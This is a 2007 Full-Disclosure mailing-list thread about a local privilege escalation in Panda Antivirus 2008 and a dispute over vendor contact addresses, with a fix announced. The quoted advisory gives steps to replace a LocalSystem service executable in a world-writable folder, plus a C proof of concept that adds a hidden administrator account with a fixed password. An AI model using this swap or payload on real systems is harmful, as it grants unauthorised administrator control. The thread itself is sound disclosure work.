Re: [Full-disclosure] Panda Antivirus 2008 Local Privileg Escalation (UPS they did it again)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 -Original message- From: 3APA3A [mailto:[EMAIL PROTECTED] [EMAIL PROTECTED] was contacted about this same vulnerability in Panda Antivirus 2007 on August, 11 2006 (more than year ago) without any results and response, until information was published in Bugtraq. The vulnerability response team was created in 10/2006 to manage vulnerability reports and create fixes as necessary. As far, as I can see, pandasecurity.com is Swedish domain of Panda while pandasoftware.com is international one. I believe it's quite reasonable to have [EMAIL PROTECTED] to be forwarded to [EMAIL PROTECTED], don't you think so? Re: [EMAIL PROTECTED] [EMAIL PROTECTED], it's the same contact mailbox at the Panda HQ domain in Spain (.es), not Sweden (.se). Public key attached. Regards, - -- Pedro Bustamante Senior Research Advisor Panda Security email: [EMAIL PROTECTED] 0xC684A6F9 vulns: [EMAIL PROTECTED] 0x70F3FEA0 phone: (+34) 91-8063700 blog: http://research.pandasoftware.com - -- -BEGIN PGP SIGNATURE- Version: PGP 8.1 iQA/AwUBRvdrw46s6aZw8/6gEQJ+bACfWyLJHFMarDWRU1h/sbD7xttIUmkAoO2W lMvAKwSZDMPuCx7yCnEFnQ+y =wLME -END PGP SIGNATURE- Panda Security Response.asc Description: Panda Security Response.asc ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Panda Antivirus 2008 Local Privileg Escalation (UPS they did it again)
Dear Panda Security Response, [EMAIL PROTECTED] was contacted about this same vulnerability in Panda Antivirus 2007 on August, 11 2006 (more than year ago) without any results and response, until information was published in Bugtraq. As far, as I can see, pandasecurity.com is Swedish domain of Panda while pandasoftware.com is international one. I believe it's quite reasonable to have [EMAIL PROTECTED] to be forwarded to [EMAIL PROTECTED], don't you think so? --Thursday, September 20, 2007, 12:58:42 AM, you wrote to full-disclosure@lists.grok.org.uk: PSR Users of vulnerable 2007 versions should upgrade to Panda Antivirus PSR 2008 and apply the fix provided. skipped PSR For future vulnerability reporting to Panda please write specifically PSR and exclusively to Panda Security Response PSR [EMAIL PROTECTED] instead of generic beta or informational PSR contact mailboxes. skipped PSR blog: http://research.pandasoftware.com -- ~/ZARAZA http://securityvulns.com/ Да, ему чертовски повезло. Эх и паршиво б ему пришлось если бы он выжил! (Твен) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Panda Antivirus 2008 Local Privileg Escalation (UPS they did it again)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Regarding the priviledge escalation report below for Panda Antivirus 2008, there is a fix available here: http://www.pandasecurity.com/homeusers/support/card?id=4idIdioma= 2ref=PAV08Dev Users of vulnerable 2007 versions should upgrade to Panda Antivirus 2008 and apply the fix provided. For future vulnerability reporting to Panda please write specifically and exclusively to Panda Security Response [EMAIL PROTECTED] instead of generic beta or informational contact mailboxes. - -- Pedro Bustamante Senior Research Advisor Panda Security email: [EMAIL PROTECTED] 0xC684A6F9 vulns: [EMAIL PROTECTED] 0x70F3FEA0 phone: (+34) 91-8063700 blog: http://research.pandasoftware.com - -- _ Security Advisory _ Severity: Medium Title: Panda Antivirus 2008 Local Privileg Escalation Date: 02.08.07 Author: tarkus (tarkus (at) tiifp (dot) org) URL: https://tiifp.org/tarkus Vendor: Panda (http://www.pandasoftware.com/) Affected Products: Panda Antivirus 2008 Not Affected Products: - Panda Internetsecurity 2008 - - Panda Antivirus + Firewall 2008 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Description: - 1. During installation of Panda Antivirus 2008 the permissions for installation folder %ProgramFiles%\Panda Security\Panda Antivirus 2008by default are set to Everyone:Full Control. Few services (e.g. PAVSRV51.EXE) are started from this folder. Services are started under LocalSystem account. There is no protection of service files. It's possible for unprivileged user to replace service executable with the file of his choice to get full access with LocalSystem privileges. Or to get privileges or any user (including system administrator) who logons to vulnerable host. This can be exploited by: a. Rename PAVSRV51.exe to PAVSRV51.old in Panda folder b. Copy any application to PAVSRV51.exe c. Reboot Upon reboot trojaned application will be executed with LocalSystem account. BTW: Check this from last year (http://www.securityfocus.com/bid/19891) POC: - #include windows.h #include stdio.h INT main( VOID ) { CHAR szWinDir[ _MAX_PATH ]; CHAR szCmdLine[ _MAX_PATH ]; GetEnvironmentVariable( WINDIR, szWinDir, _MAX_PATH ); printf( Creating user \owner\ with password \PandaOWner123\...\n ); wsprintf( szCmdLine, %s\\system32\\net.exe user owner PandaOWner123 /add, szWinDir ); system( szCmdLine ); printf( Adding user \owner\ to the local Administrators group...\n ); wsprintf( szCmdLine, %s\\system32\\net.exe localgroup Administrators owner /add, szWinDir ); system( szCmdLine ); return 0; } Vendor Response: - [...] Thank you very much for having reported us this piece of information. This feedback will allow us to keep improving our products and to prepare new releases that will fit your actual needs and helps us to create a better product. [...] Disclosure Timeline: - 2007.06.07 - Vulnerability found 2007.06.07 - Reported to Vendor (Until Beta) 2007.07.31 - Released by vender 2007.08.02 - Public Disclosure -BEGIN PGP SIGNATURE- Version: PGP 8.1 iQA/AwUBRvGNgo6s6aZw8/6gEQKByQCgkNraFuCwXwqU13zaJfvRroHgKQcAn3mz lluFlAcVUyeyeuMXqRaiygc5 =8GnR -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/